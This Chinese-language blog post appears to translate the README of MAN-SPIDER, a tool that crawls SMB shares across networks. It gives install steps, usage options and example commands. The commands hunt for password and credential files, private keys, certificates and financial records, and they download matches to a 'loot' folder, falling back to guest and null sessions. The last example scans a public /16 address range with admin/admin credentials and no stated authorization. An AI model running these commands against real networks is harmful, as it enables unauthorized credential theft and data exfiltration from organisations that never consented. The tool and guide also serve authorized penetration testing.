manspider 爬取整个网络上的SMB共享文件

manspider 爬取整个网络上的SMB共享文件

manspider 爬取整个网络上的SMB共享文件,可以搜索文件名或文件内容 – 支持正则表达式!

支持的文件类型:

任何基于文本的格式

  • PDF
  • DOCX
  • XLSX
  • PPTX
  • 等等

MAN-SPIDER 将抓取每个目标系统上的每个共享文件。如果提供的凭据不起作用,它将回退到“访客”,然后回退到空会话。

manspider 爬取整个网络上的SMB共享文件

manspider安装方法

(可选)安装这些依赖项以添加额外的文件解析功能:

#抓取图片(png, jpeg)
sudo apt install tesseract tesseract-data-eng
# 对于遗留文档支持(.doc)
sudo apt install antiword

安装 manspider(请耐心等待,这可能需要一段时间):

pip install pipx
pipx install man-spider

kali linux可以直接使用如下命令进行安装

manspider 爬取整个网络上的SMB共享文件
pip3 install man-spider

manspider使用方法

示例 #1:在网络中搜索可能包含凭据的文件名

manspider 爬取整个网络上的SMB共享文件

注意:匹配的文件会自动下载到$HOME/.manspider/loot! (-n禁用)

manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u bob -p Passw0rd

示例 2:搜索包含“密码”的 XLSX 文件

manspider share.evilcorp.local -c password -e xlsx -d evilcorp -u bob -p Passw0rd

示例 #3:搜索有趣的文件扩展名

manspider share.evilcorp.local -e bat com vbs ps1 psd1 psm1 pem key rsa pub reg txt cfg conf config -d evilcorp -u bob -p Passw0rd

示例 4:搜索与财务相关的文件

此示例在听起来像金融的目录中搜索包含 5 个或更多连续数字的文件名(例如000202006.EFT

manspider share.evilcorp.local --dirnames bank financ payable payment reconcil remit voucher vendor eft swift -f '[0-9]{5,}' -d evilcorp -u bob -p Passw0rd

示例 5:搜索证书

manspider share.evilcorp.local -e pfx p12 pkcs12 pem key crt cer csr jks keystore key keys der -d evilcorp -u bob -p Passw0rd

使用技巧#1:

您可以一次运行多个 manspider 进程。当一个进程已经在运行并且您想搜索它下载的内容(类似于grep -R)时,这很有用。为此,请将关键字指定loot为目标,这将在 .zip 文件中搜索下载的文件$HOME/.manspider/loot

使用技巧#2:

合理的默认值有助于防止出现不必要的情况,例如卡在单个目标上。所有这些都可以被覆盖:

  • 默认蜘蛛深度:10(-m覆盖)
  • 默认最大文件大小:10MB(-s覆盖)
  • 默认线程:5(用-t 覆盖)
  • 排除共享:C$IPC$ADMIN$,PRINT$(用 覆盖--exclude-sharenames

使用技巧 #3:

Manspider 接受以下任意组合作为目标:

  • 知识产权
  • 主机名
  • 子网(CIDR 格式)
  • 包含上述任何内容的文件
  • 包含文件的本地文件夹

例如,您可以指定任何或所有这些:

  • 192.168.1.250
  • share.evilcorp.local
  • 192.168.1.0/24
  • smb_hosts.txt
  • loot (搜索已经下载的文件)
  • /mnt/share (递归搜索目录)
    • 注意:搜索本地文件时,必须指定目录,而不是单个文件

用法:

用法: manspider [-h] [-u 用户名] [-p 密码] [-d 域名] [-m 最大搜索深度] [-H HASH] [-t 线程] [-f 正则表达式 [REGEX ...]] [-e EXT [EXT ...]] [--exclude-extensions EXT [EXT ...]]
                 [-c REGEX [REGEX ...]] [--sharenames SHARE [SHARE ...]] [--exclude-sharenames [SHARE ...]] [--dirnames DIR [DIR ...]] [--exclude-dirnames DIR [DIR ...]] [-q] [-n][-mfail INT] [-o] [-s SIZE] [-v]
                 targets [targets ...]

扫描多汁的SMB共享数据。匹配的文件和日志存储在$HOME/.manspider中。所有过滤器都不区分大小写。

位置参数:
  目标               ips,主机名,CIDR范围,或包含目标到蜘蛛的文件(注:本地搜索也支持,指定目录名或关键字“战利品”搜索下载文件)

可选参数:
  -h, --help            显示帮助信息并退出
  -u 用户名, --username 用户名
                        进行身份验证的用户名
  -p 密码, --password 密码
                        进行身份验证的密码
  -d DOMAIN, --domain DOMAIN
                        进行身份验证的密域
  -m 最大爬行深度, --maxdepth 最大爬行深度
                        最大爬行深度(默认:10)
  -H HASH, --hash HASH  用于身份验证的NTLM HASH值
  -t 线程, --threads 线程
                        并发线程(默认值:5)
  -f 正则表达式 [REGEX ...], --filenames 正则表达式 [REGEX ...]
                        使用regex(空格分隔)过滤文件名
  -e EXT [EXT ...], --extensions EXT [EXT ...]
                        只显示带有这些扩展名的文件名(以空格分隔,例如。' docx xlsx '仅适用于word和excel文档)
  --exclude-extensions EXT [EXT ...]
                        忽略带有这些扩展名的文件
  -c REGEX [REGEX ...], --content REGEX [REGEX ...]
                        使用正则表达式搜索文件内容(支持多个)
  --sharenames SHARE [SHARE ...]
                        只搜索具有这些名称的共享(支持多个)
  --exclude-sharenames [SHARE ...]
                        不要搜索带有这些名称的共享(支持多个)
  --dirnames DIR [DIR ...]
                        只搜索包含这些字符串的目录(支持多个)
  --exclude-dirnames DIR [DIR ...]
                        不要搜索包含这些字符串的目录(支持多个)
  -q, --quiet           不显示匹配的文件内容
  -n, --no-download     不下载匹配文件
  -mfail INT, --max-failed-logons INT
                        限制登录失败
  -o, --or-logic        使用OR逻辑而不是AND(如果文件名或扩展名或内容匹配,文件将被下载)
  -s SIZE, --max-filesize SIZE
                        不要检索超过这个大小的文件,例如。“500k”或“。5m”(默认值:10m)
  -v, --verbose         显示调试信息

例如使用如下命令对 66.106.0.0/16 进行smb共享扫描,只要xlsx文件

manspider --threads 512 66.106.0.0/16 -u admin -p admin -e xlsx

默认输出文件保存在 /root/.manspider/loot 目录下 [找不到此文件的记得打开显示隐藏文件.]

manspider 爬取整个网络上的SMB共享文件
manspider 爬取整个网络上的SMB共享文件

转载请注明出处及链接.

Leave a Reply

您的邮箱地址不会被公开。 必填项已用 * 标注